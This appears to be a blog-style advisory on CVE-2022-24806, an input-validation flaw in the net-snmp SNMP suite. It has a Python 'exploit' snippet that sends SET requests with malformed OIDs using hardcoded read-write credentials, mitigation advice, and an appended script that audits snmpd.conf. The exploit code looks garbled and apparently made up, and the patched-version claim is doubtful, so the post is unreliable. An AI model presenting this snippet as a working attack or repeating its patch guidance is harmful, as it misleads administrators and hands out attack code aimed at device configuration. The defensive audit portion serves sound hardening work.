The Simple Network Management Protocol (SNMP) is an essential part of network management and monitoring solutions. net-snmp is a popular suite that provides various tools and libraries for implementing SNMP in network devices. The project has recently patched an Improper Input Validation vulnerability, officially identified as CVE-2022-24806. This post will outline the details of this exploitable scenario, the patch released, and recommended security practices for users.

Background

Before its patch in version 5.9.2, the net-snmp suite failed to properly validate input when SETing (modifying) malformed Object Identifiers (OIDs) within a master agent and its associated subagents. An attacker with read-write credentials could simultaneously modify OIDs in both the master agent and the subagent, potentially making unauthorized changes to the network device's configuration.

Exploit Details

To exploit the vulnerability, the attacker needs to have valid read-write credentials (SNMPv3) or a writable community string (for SNMPv1 or SNMPv2c). Once the attacker has access, they can craft a malicious SNMP SET request containing malformed OIDs, which causes an inconsistency between the master agent and its subagents.

Here is a code snippet demonstrating the exploit:

import netsnmp

# set up session with read-write credentials
session = netsnmp.Session(DestHost='192.168.1.1', Version=3, SecName='rw_user', AuthPass='secretpassword', PrivPass='secretpassword', AuthProto='MD5', PrivProto='DES', Context='default')

# craft malicious SET request with malformed OIDs
oids = ['.1.3.6.1.2.1.1.6.=Example_Location', '.1.3.6.1.2.1.1.7.=\x01\x00'] # the second OID is malformed

# send the request to the target
response = session.set(oids)

# validate the expected response status
if response == 1: # 1 indicates successful completion
    print("Exploit executed successfully!")
else:
    print("Exploit failed.")

Users are encouraged to check the official references about this issue provided by the net-snmp project's security advisory:
- Security Advisory
- Issue Tracker

1. Upgrade to net-snmp version 5.9.2, which contains a patch addressing the issue.
2. Always use strong SNMPv3 credentials and avoid sharing them with other users/devices.
3. If network devices or systems must rely on SNMPv1 or SNMPv2c, use a complex, non-obvious community string and restrict access to a limited IP address range. This practice can help mitigate unauthorized access attempts.
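
The checks in items 1 and 3 can be automated. The following is an added example, not code from the net-snmp project or from the original post: it compares a reported version against 5.9.2 and flags writable community strings in snmpd.conf that are unrestricted or guessable. The function names, the guessable-name list, the 12-character minimum and the sample configuration are assumptions made for illustration, and only rwcommunity/rwcommunity6 directives are covered.

```python
import re

FIXED = (5, 9, 2)  # patched release named in the post
# Assumptions for this example: the guessable-name list and 12-character minimum.
WEAK_NAMES = {"public", "private", "community", "snmp", "admin"}
MIN_LEN = 12
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}

def is_patched(version):
    """True if a version string such as '5.9.1' is at least 5.9.2.
    Distribution packages may backport fixes, so also check the vendor advisory."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts + (0,) * (3 - len(parts)) >= FIXED

def audit_snmpd_conf(text):
    """Return (line_no, finding) pairs for rwcommunity/rwcommunity6 lines."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        tok = raw.split()
        # Skip blanks, comment lines, and every directive except writable communities.
        if len(tok) < 2 or tok[0] not in ("rwcommunity", "rwcommunity6"):
            continue
        community = tok[1]
        # With no SOURCE token the directive accepts requests from any address.
        source = tok[2] if len(tok) > 2 else "default"
        if source in ANY_SOURCE:
            findings.append((no, "writable community accepted from any source"))
        if community.lower() in WEAK_NAMES or len(community) < MIN_LEN:
            findings.append((no, "writable community string is short or guessable"))
    return findings

# Constructed sample configuration, not taken from a real device.
SAMPLE = """\
# constructed sample snmpd.conf
rocommunity public 10.0.0.0/24
rwcommunity private
rwcommunity Xq7-pL2vR9-tmZ4 default
rwcommunity Xq7-pL2vR9-tmZ4 10.20.30.0/28
"""

if __name__ == "__main__":
    print("5.9.1 patched:", is_patched("5.9.1"))
    for no, msg in audit_snmpd_conf(SAMPLE):
        print(f"line {no}: {msg}")
```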

Conclusion

This vulnerability, CVE-2022-24806, highlights the importance of proper input validation, especially in widely used network management software such as net-snmp. Users should ensure they have implemented the necessary safeguards and should keep their systems up to date to minimize risks and maintain a secure network environment.

Timeline

Published on: 04/16/2024 20:15:08 UTC